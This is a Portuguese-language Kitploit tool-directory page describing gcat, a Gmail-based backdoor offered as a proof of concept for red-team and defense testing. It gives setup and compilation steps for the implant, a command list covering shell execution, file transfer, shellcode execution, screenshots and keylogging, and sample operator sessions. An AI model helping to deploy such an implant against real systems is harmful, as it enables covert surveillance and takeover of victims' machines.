Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
gcat — Um backdoor de PoC que usa o Gmail como servidor C&C. | Kitploit
Ferramentas/GitHubGitHub/byt3bl33d3r/gcat
ExploraçãoPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de PayloadsCavalo de Troia de Acesso RemotoArchived
GitHubbyt3bl33d3r/gcat

gcat

Um backdoor de PoC que usa o Gmail como servidor C&C.

Ver Repositório
1.4k416há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gcat

Um backdoor furtivo baseado em Python que usa o Gmail como servidor de comando e controle

Este projeto foi inspirado no código PoC original de Benjamin Donnelly

Este é um código PoC...

... que foi lançado para que organizações testem suas defesas contra esses tipos de ataque. Para detectá-los, veja projetos como RITA.

Para uma versão mais atualizada e mantida deste projeto, veja GDog

Configuração

Para que isso funcione, você precisa de:

  • Uma conta do Gmail (Use uma conta dedicada! Não use a sua pessoal!)
  • Ative "Allow less secure apps" nas configurações de segurança da conta
  • Talvez você também precise habilitar o IMAP nas configurações da conta

Este repositório contém dois arquivos:

  • gcat.py um script usado para enumerar e enviar comandos aos clientes disponíveis
  • implant.py o backdoor propriamente dito para implantar

Em ambos os arquivos, edite as variáveis gmail_user e gmail_pwd com o nome de usuário e a senha da conta que você configurou anteriormente.

Você provavelmente vai querer compilar o implant.py em um executável usando o Pyinstaller

Nota: Recomenda-se compilar o implant.py usando uma instalação Python de 32 bits

Uso

root@kitploit:~
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  
                     

                   .__....._             _.....__,
                     .": o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!

  • Depois de implantar o backdoor em alguns sistemas, você pode verificar os clientes disponíveis usando o comando list:
root@kitploit:~
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

A saída é uma string UUID que identifica exclusivamente o sistema e o SO no qual o implante está sendo executado

  • Vamos enviar um comando para um implante:
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Aqui estamos dizendo ao 90b2cd83-cb36-52de-84ee-99db6ff41a11 para executar ipconfig /all; o script então exibe o jobid que podemos usar para recuperar a saída desse comando

  • Vamos obter os resultados!
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • Essa é a essência! Mas você pode fazer muito mais, como pode ver pelo uso do script! ;)

A fazer

  • Suporte a múltiplas plataformas
  • Comando para enviar arquivos
  • Criptografia de transporte e ofuscação
Baixar ferramenta